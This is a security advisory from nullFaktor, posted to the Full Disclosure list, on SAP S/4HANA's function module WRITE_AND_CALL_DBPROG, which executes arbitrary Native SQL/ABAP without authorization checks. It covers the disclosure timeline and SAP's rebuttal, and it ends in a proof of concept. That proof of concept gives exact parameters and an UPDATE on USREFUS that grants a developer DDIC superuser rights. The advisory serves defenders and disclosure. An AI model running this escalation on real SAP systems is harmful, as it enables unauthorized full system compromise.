nullFaktor Security Advisory < 20250719 >
===========================================================
Title: ABAP Code Execution via Internal Function
Module WRITE_AND_CALL_DBPROG
Vulnerability: Exposed Dangerous Functionality
Product: SAP NetWeaver S/4HANA
Homepage: http://www.sap.com
Affected Version: S/4HANA, SAP_BASIS 757 SP 3
SAP Note: 3546011
Impact: High
CVSS 3.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:
H/VI:H/VA:H/SC:N/SI:N/SA:N
CVSS 4.0 Score: 8.4
CWE: CWE-749: Exposed Dangerous Method or
Function
CWE-94: Improper Control of Generation
of Code ('Code Injection')
Date: 2025-10-07
Author: Raschin Tavakoli | nullFaktor GmbH
https://www.nullfaktor.com
office at nullfaktor dot com
Blog: https://www.nullfaktor.com/blog
#Advisory_09-07-25
===========================================================
Vendor description:
===================
SAP SE is a European multinational software company based
in Walldorf, Baden-Württemberg, Germany. It develops
enterprise software to manage business operation and
customer relations. The company is the world's largest
enterprise resource planning (ERP) software vendor.
Timeline:
=========
06.09.2024 nullFaktor inital contact to SAP
11.09.2024 First response from SAP PSRT. SAP informs us
that they do not consider the issue a security
vulnerability
12.09.2024 nullFaktor responds via email with more detailed
information
07.11.2024 SAP responded with an email containing a
rebuttal, explaining why they still do not
consider this issue a security vulnerability.
07.11.2024 nullFaktor responds via email with further
arguments
13.12.2024 SAP responds with email, asks for a video call
13.01.2025 nullFaktor responds with email regarding video
call
05.02.2025 Video call with SAP. nullFaktor acknowledges
SAP's reasoning, and both parties agree that, in
a properly maintained system, the issue does not
pose a security risk. SAP gives the green light
for public disclosure of the issue, but requests
that customers be made aware of their reasoning.
02.07.2025 nullFaktor sends final draft to SAP via email
10.07.2025 Advisory release
Vulnerability
===============
During our security research into internal SAP® code in
SAP® S/4HANA, we identified that the function module
WRITE_AND_CALL_DBPROG in function group SDB2 exposes
dangerous functionality that allows users to execute
arbitrary Native SQL.
Further the SQL code is written into a report using INSERT
REPORT and then executed dynamically - without any input
validation or authorization checks being performed.
This behavior enables ABAP code injection and arbitrary
code execution within the SAP system.
The prerequisite for exploiting this vulnerability is
authorization to execute local function modules, which
always includes the S_DEVELOP authorization with
ACTVT = 16 (Execute).
According to SAP, this authorization should never be
assigned in production systems. Therefore, SAP does not
classify this as a security vulnerability.
However, in our opinion, the issue is still relevant from
a security perspective. In practice, authorizations in
large SAP environments are often misconfigured or overly
permissive - it cannot be assumed that all users
(sometimes thousands) are configured strictly enough to
prevent misuse.
A potentially malicious user could exploit this function
module to bypass multiple critical security controls,
such as:
1. Bypassing ANY authorization restrictions: Arbitrary data
can be read, modified, or deleted in the database,
effectively resulting in full system compromise and
potentially affecting connected systems as well.
2. Inserting custom code into the SAP namespace: The
attacker can write ABAP code into standard namespaces
(e.g., by creating new reports).
3. Bypassing system/client modifiability locks: Code changes
can be introduced even when the system or client is set
to "not modifiable."
Hence, giving access to local function module execution (for
example via SE37 or SE80 and S_DEVELOP/ACTVT=16) is
equivalent to granting SAP_ALL.
As such, this makes the distinction between
S_DEVELOP/ACTVT=16 and SAP_ALL largely meaningless from an
attacker's perspective.
Furthermore, the issue is also relevant for non-productive
systems, for example if developers or testers are not
subject to additional restrictions on the S_DEVELOP
authorization (such as OBJNAME, DEVCLASS, etc.).
Currently, there is no patch available to address this
issue. It is therefore strongly recommended to review
user authorizations, ensure that no users have access to
transaction SE37 in combination with S_DEVELOP / ACTVT = 16
(Execute) on production systems. On non-production systems,
the corresponding object types must also be defined in
detail.
Feedback from SAP
=================
No user in a production system should have assigned
S_DEVELOP with ACTVT 16. Therefore SAP does not consider
this issue as a vulnerability and no patch will be
released. For every developer, the S_DEVELOP authorization
must be fully and carefully maintained. Unfortunately, in
SAP on-premise environments, it is not sufficient to
restrict only the activity (ACTVT). The corresponding
object types must also be defined in detail, depending on
what the developer should be allowed to create, modify,
delete, or test.
Please also refer to https://me.sap.com/notes/3546011
Attack Scenario
===============
A local attacker with privileges to execute the local
function modules via (for ex. SE80, SE37) can inject
arbitrary ABAP Code, enabling him to bypass any security
restrictions and compromise the system.
Proof of Concept
================
To demonstrate the issue, we showcase that we are able to
execute arbitrary commands. For the proof of concept, we
want to add the reference user DDIC (Super User) to our
current user DEVELOPER.
The following shows the content of Table USREFUS before
executing the exploit (can be viewed for example via
transaction SE16):
MANDT BNAME REFUSER USERALIAS
001 BWDEVELOPER
001 DDIC
001 DEVELOPER
001 DEVELOPER_5
001 SAP*
001 SDMI_DLRYYAU
In the next step, the local function module
WRITE_AND_CALL_DBPROG is opened via transaction SE37.
The following values are filled to the form fields (input
parameters) of the function module:
NO_EXEC = ""
PRID = "0"
PROGNAME = "Z_HACKED"
MAX_SEVERITY = "E"
ABAP_FLAG = "X"
DBCON_NAME = "X"
STMT = "X"
The following value is filled into the table parameter
(input parameter) STATEMENTS:
STATEMENTS = "UPDATE USREFUS SET REFUSER = 'DDIC' WHERE
BNAME = 'DEVELOPER'."
After executing the function module, a report called
"Z_HACKED" is created and executed.
The code of the generated report is as follows:
PROGRAM Z_HACKED.
FORM GENFORM USING RC.
UPDATE USREFUS SET REFUSER = 'DDIC' WHERE BNAME =
'DEVELOPER'.
RC = 0.
ENDFORM.
Executing this code successfully attaches the REFUSER DDIC
to the user DEVELOPER, effectively granting super user
privileges.
Via SE16 we can see the changed content of table USREFUS:
MANDT BNAME REFUSER USERALIAS
001 BWDEVELOPER
001 DDIC
001 DEVELOPER DDIC
001 DEVELOPER_5
001 SAP*
001 SDMI_DLRYYAU
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
About nullFaktor
nullFaktor is an Austrian Cyber Security company offering
services such as Penetration Testing, Cyber Defense, and
IT Security Consulting.
In addition, nullFaktor runs a dedicated
SAP Security Division focused on SAP Cyber Security.
Services include SAP Penetration Testing as well as
strategic SAP Security Advisory.
Ongoing research activities strengthen nullFaktor's
consulting and assessment services by ensuring up-to-date
knowledge of modern attack vectors, misconfigurations, and
pitfalls in secure architecture patterns. This enables
clients to make informed decisions and improve their IT
security posture based on real-world risk scenarios.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Want to strengthen your IT or SAP security posture?
Get in touch at https://www.nullfaktor.com/#kontakt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: office at nullfaktor dot com
Web: https://www.nullfaktor.com
Blog: https://www.nullfaktor.com/blog
X.com: https://x.com/_nullfaktor
EOF Raschin Tavakoli / @2025
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
